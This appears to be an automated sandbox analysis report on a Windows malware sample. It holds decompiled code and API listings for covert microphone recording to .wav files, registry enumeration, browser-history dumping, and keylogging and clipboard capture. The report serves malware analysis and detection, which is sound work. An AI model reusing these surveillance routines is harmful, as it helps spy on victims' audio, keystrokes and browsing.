                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                                                                					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                                                                					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                                                                					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                                                                					RegCloseKey(_v8);
                                                                                					_t47 = 1;
                                                                                				}
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return _t47;
                                                                                			}





























                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                                                                  • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                                                                  • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                                                                • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                                                                  • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                                                                  • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                                                                  • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                                                                  • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                                                                  • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                                                                  • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                                                                  • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 3909728815-0
                                                                                • Opcode ID: f7bc1bf121c0d1dec5c1e58393eac45501402c9de18fe7a224fb86ccbd9269ea
                                                                                • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                                                                • Opcode Fuzzy Hash: f7bc1bf121c0d1dec5c1e58393eac45501402c9de18fe7a224fb86ccbd9269ea
                                                                                • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E00401640(void* __edx, intOrPtr _a8, char _a11) {
                                                                                				char _v5;
                                                                                				char _v12;
                                                                                				void* _v28;
                                                                                				char _v44;
                                                                                				char _v60;
                                                                                				char _v76;
                                                                                				char _v92;
                                                                                				char _v108;
                                                                                				char _v188;
                                                                                				int _t23;
                                                                                				char* _t25;
                                                                                				char* _t32;
                                                                                				char* _t33;
                                                                                				char* _t34;
                                                                                				CHAR* _t36;
                                                                                				intOrPtr _t37;
                                                                                				void* _t56;
                                                                                
                                                                                				_t23 =  &_v5;
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
                                                                                				if(_a8 == 0x3c0) {
                                                                                					__imp__time( &_v12, _t56);
                                                                                					_t25 =  &_v12;
                                                                                					__imp__localtime(_t25);
                                                                                					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
                                                                                					_t32 =  &_v76;
                                                                                					L00414152();
                                                                                					_t33 =  &_v108;
                                                                                					L0041414C();
                                                                                					_t34 =  &_v60;
                                                                                					L00414146();
                                                                                					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					E004013BE(_t34, 0x41b1a0);
                                                                                					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					0x41b1a0->lpData = _t36;
                                                                                					_t37 =  *0x41b1d8; // 0x0
                                                                                					 *0x41b1a4 = _t37;
                                                                                					 *0x41b1a8 = 0;
                                                                                					 *0x41b1ac = 0;
                                                                                					 *0x41b1b0 = 0;
                                                                                					 *0x41b1b4 = 0;
                                                                                					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                                                                					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t23;
                                                                                			}

                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                                                                • time.MSVCRT ref: 00401668
                                                                                • localtime.MSVCRT ref: 00401672
                                                                                • strftime.MSVCRT ref: 00401687
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                                                                  • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                                                                • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                                                                • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                                                                • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                                                                • String ID: %Y-%m-%d %H.%M$.wav
                                                                                • API String ID: 4079669728-3597965672
                                                                                • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                                                                • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                                                                • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                                                                • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E004013BE(long _a4, void** _a8) {
                                                                                				void _v8;
                                                                                				void _v12;
                                                                                				void _v16;
                                                                                				void _v20;
                                                                                				void _v24;
                                                                                				void _v28;
                                                                                				signed int _t37;
                                                                                				signed int _t41;
                                                                                				void* _t82;
                                                                                				signed int _t83;
                                                                                				signed int _t89;
                                                                                
                                                                                				_t83 =  *0x41b21a & 0x0000ffff;
                                                                                				_t37 = ( *0x41b226 & 0x0000ffff) * _t83;
                                                                                				_v20 = _t37 *  *0x41b21c >> 3;
                                                                                				asm("cdq");
                                                                                				_t89 = 8;
                                                                                				_v16 = 1;
                                                                                				_v12 = 0x10;
                                                                                				_v24 = _t37 / _t89;
                                                                                				_t41 = _a8[1] * _t83;
                                                                                				_v28 = _t41;
                                                                                				_v8 = _t41 + 0x24;
                                                                                				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                				if(_t82 != 0xffffffff) {
                                                                                					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
                                                                                					WriteFile(_t82,  &_v8, 4,  &_a4, 0);
                                                                                					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
                                                                                					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
                                                                                					WriteFile(_t82,  &_v12, 4,  &_a4, 0);
                                                                                					WriteFile(_t82,  &_v16, 2,  &_a4, 0);
                                                                                					WriteFile(_t82, 0x41b21a, 2,  &_a4, 0);
                                                                                					WriteFile(_t82, 0x41b21c, 4,  &_a4, 0);
                                                                                					WriteFile(_t82,  &_v20, 4,  &_a4, 0);
                                                                                					WriteFile(_t82,  &_v24, 2,  &_a4, 0);
                                                                                					WriteFile(_t82, 0x41b226, 2,  &_a4, 0);
                                                                                					WriteFile(_t82, "data", 4,  &_a4, 0);
                                                                                					WriteFile(_t82,  &_v28, 4,  &_a4, 0);
                                                                                					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);
                                                                                					CloseHandle(_t82);
                                                                                					return 1;
                                                                                				}
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                                                                • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
                                                                                • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                                                                • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                                                                • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                                                                • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Write$Create
                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                • API String ID: 1602526932-4212202414
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                                                                  • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                                                                  • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                                                                  • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                                                                  • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                                                                  • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • Sleep.KERNEL32(000000FA), ref: 00401C24
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                                                                Strings
                                                                                • /sort "Visit Time" /stext ", xrefs: 00401B97
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                                                                • String ID: /sort "Visit Time" /stext "
                                                                                • API String ID: 1247708949-1573945896
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,00017DA8,?), ref: 0040697B
                                                                                • toupper.MSVCRT ref: 0040698A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                                                                • toupper.MSVCRT ref: 00406A61
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                                                                  • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
